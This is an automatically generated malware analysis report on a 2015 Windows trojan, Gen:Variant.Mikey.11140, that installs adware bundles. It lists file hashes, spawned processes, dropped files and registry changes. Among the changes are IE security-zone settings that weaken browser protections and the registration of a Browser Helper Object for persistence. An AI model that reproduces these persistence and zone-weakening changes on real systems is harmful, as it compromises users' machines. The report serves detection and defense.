Gen.Variant.Mikey.11140_0a26569297

by malwarelabrobot on August 14th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Mikey.11140 (B) (Emsisoft), Gen:Variant.Mikey.11140 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 0a2656929765226281c3bbb0fce9dcc5
SHA1: 6149e4396a7c33efa97da8a5db62357e8f7c2313
SHA256: 21fdfb9d0b8e3f0b7fde4d4831ba8a39b602dfdc306b043c0d388220e168eff0
SSDeep: 24576:6U7Wx/eIT4NkPTZ2 WLcDlvmHrzdoeqhNnz8ioZR74wjY4L436wfyYT6gjTtLXaP:qeIQoTszElviynXoZp904L43F6YT/Pt
Size: 1432064 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-30 12:35:16
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

BROWSE~2.EXE:3920
ins_geforce.exe:2072
ShopperPro.exe:3444
9ba9693.exe:2936
ins_shopperpro.:540
Vxsysrohsgnosa.exe:3856
regsvr32.exe:3680
ping.exe:4080
ping.exe:3592
ping.exe:3920
ping.exe:3900
ping.exe:3776
ping.exe:2296
ping.exe:4016
ping.exe:2472
ping.exe:3672
ping.exe:3148
ping.exe:2960
ping.exe:4008
ping.exe:1544
ping.exe:1540
ping.exe:3364
ping.exe:3692
ping.exe:1652
ping.exe:548
ping.exe:2240
ping.exe:4044
ping.exe:3452
ping.exe:3600
ping.exe:2460
ping.exe:3912
ping.exe:2284
ping.exe:3136
ping.exe:4036
ping.exe:2972
ping.exe:3312
ping.exe:3884
ping.exe:3784
ping.exe:3460
ping.exe:2232
ping.exe:3372
ping.exe:4072
net.exe:3368
net.exe:2624
%original file name%.exe:1076
%original file name%.exe:1704
%original file name%.exe:460
%original file name%.exe:1980
%original file name%.exe:264
ins_sense.exe:2100
sc.exe:2344
sc.exe:3936
setup.exe:3084
setup.exe:3256
Smskc.exe:3904
net1.exe:3800
net1.exe:2732
tcpsvcs.exe:756
0ead95b.exe:2928

The Trojan injects its code into the following process(es):

YTDownloader.exe:3496

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ins_geforce.exe:2072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process ShopperPro.exe:3444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files%\ShopperPro\config.json (488 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)

The process 9ba9693.exe:2936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\hhmip.dll (2040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Vxsysrohsgnosa.exe (1214930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\krkdagll.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\yllbd.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25213.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Syuzm.tmp (341417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_e (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_d (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_a (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_c (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_b (129336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\hhmip.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[2].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\krkdagll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Vxsysrohsgnosa.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\yllbd.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Syuzm.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\utility[2].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\utility[1].gif (0 bytes)

The process ins_shopperpro.:540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (86827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup.exe (869966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup1.exe (79085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\D1958.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\D1958.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup1.exe (0 bytes)

The process Vxsysrohsgnosa.exe:3856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Sense\761d4877-9cd4-4df2-ba2a-b233e898173d-5.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\yllbd.dll (11 bytes)
%WinDir%\Tasks\761d4877-9cd4-4df2-ba2a-b233e898173d-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\452330 (9292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\cuwdhtg.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\qyahrzef.dll (29256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\wxabgab.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\krkdagll.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\355497 (39553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp (4 bytes)
%Program Files%\Sense\utils.exe (65500 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\kpusqxa.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\ztfkyrh.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (541698 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\yllbd.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\452330 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\cuwdhtg.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\qyahrzef.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\wxabgab.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[2] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\krkdagll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\355497 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\kpusqxa.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\ztfkyrh.dll (0 bytes)

The process %original file name%.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\bxsdk32.dll (2386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_geforce.exe (1497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_sense.exe (1501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_shopperpro.exe (31368 bytes)

The process ins_sense.exe:2100 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process setup.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\YTDownloader\libeay32.dll (25608 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (44437 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (48358 bytes)
%Program Files%\YTDownloader\Unelevate.exe (2752 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (11027 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (4233 bytes)
%Program Files%\YTDownloader\Updater.exe (17866 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (10774 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\AccDownload.dll (9226 bytes)
%Program Files%\Common Files\System\SysMenu.dll (15201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (19904 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Program Files%\YTDownloader\convert_ani.gif (765 bytes)
%Program Files%\YTDownloader\converter.exe (61450 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa18.tmp (0 bytes)

The process setup.exe:3256 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\ShopperPro\Updater.exe (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\MoreInfo.dll (7 bytes)
%Program Files%\ShopperPro\database1_0_0.json (4 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (158611 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\AccDownload.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\System.dll (11 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\jsdrv.exe (100378 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
%Program Files%\ShopperPro\database1_0_0.ej (6 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\MoreInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\jsdrv.exe (0 bytes)

The process Smskc.exe:3904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Ge-Force\fca20dba-4ecb-4c27-af30-29134a166813-5.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\vbsqyfj.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\btqiknpx.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\kbkvm.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\qoozvalm.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\yfovh.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\413541 (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[2] (40 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\lxpnxblef.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\18420 (38869 bytes)
%Program Files%\Ge-Force\utils.exe (71855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\wgldbpigk.dll (6 bytes)
%WinDir%\Tasks\fca20dba-4ecb-4c27-af30-29134a166813-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj14.tmp (567693 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\vbsqyfj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\btqiknpx.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\kbkvm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\qoozvalm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\yfovh.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\413541 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\lxpnxblef.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\18420 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\wgldbpigk.dll (0 bytes)

The process tcpsvcs.exe:756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\setup1.exe (229796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\setup.exe (2555480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\D1958.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst5.tmp (240925 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp (0 bytes)

The process 0ead95b.exe:2928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_e (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_d (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_c (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_b (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_a (130347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Lyqdtqcl.tmp (347770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25213.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Smskc.exe (1247400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\auhdqaj.dll (2021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\qoozvalm.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\lxpnxblef.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Smskc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[2].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Lyqdtqcl.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\auhdqaj.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\lxpnxblef.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\qoozvalm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp (0 bytes)

Registry activity

The process BROWSE~2.EXE:3920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 39 77 CE 2E 0B FD 17 30 86 7D 29 89 F2 01 8A"

The process ins_geforce.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 36 B8 EB 3A 55 25 8E 4B 6F BD FA BB 0F 2A CB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"0ead95b.exe" = "0ead95b"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The process ShopperPro.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"ExeLocation" = "%Program Files%\ShopperPro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtID" = "ojhagnahfpegocdhlopgljpaafeogmcc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\ShopperPro]
"CONFIGLOCATION" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKLM\SOFTWARE\ShopperPro\ExtraInfo]
"DBVersion" = "1.0.2.0"

[HKLM\SOFTWARE\ShopperPro]
"DBLocation" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"Aff" = "obrdc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\ShopperPro]
"Version" = "3.2.11073.2296"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtFile" = "ShopperPro.crx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 95 9D B4 A6 0D EF FB 93 11 5C C3 99 7B 6A 93"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\ShopperPro]
"UserId" = "99999999-9999-4996-b722-50633741fbe4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

